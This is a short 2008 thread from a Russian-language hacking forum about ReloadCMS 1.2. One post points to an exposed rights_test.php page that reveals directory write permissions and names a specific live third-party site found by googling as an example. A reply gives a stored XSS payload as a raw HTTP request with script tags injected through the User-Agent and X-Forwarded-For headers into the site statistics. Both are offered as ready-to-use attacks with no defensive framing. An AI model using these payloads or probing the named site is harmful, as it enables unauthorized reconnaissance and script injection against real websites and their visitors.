ReloadCMS (просмотр директорий и прав на запись)

Discussion in 'Веб-уязвимости' started by USAkid, 17 Dec 2008.

  1. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    ReloadCMS (просмотр директорий и прав на запись)
    Уязвимый продукт: ReloadCMS 1.2.* (более не тестировал)
    CMS без MySQL.
    Хороший способ, чтобы узнать где какие права стоят.

    Example:
    Code:
    http://site.com/path_to_cms/tools/rights_test.php
    Немного погуглив нашел пример такого сайта:
    Code:
    http://ziggyred.com/test/tools/rights_test.php
     
    #1 USAkid, 17 Dec 2008
  2. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    это не баг, это фича (c) =)

    Вот еще активная XSS (в статистике сайта):
    Code:
    GET / HTTP/1.0
User-Agent: <script>alert()</script>
X-Forwarded-For: <script>alert()</script>
Host: localhost
Connection: close
     
    #2 [Raz0r], 17 Dec 2008
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.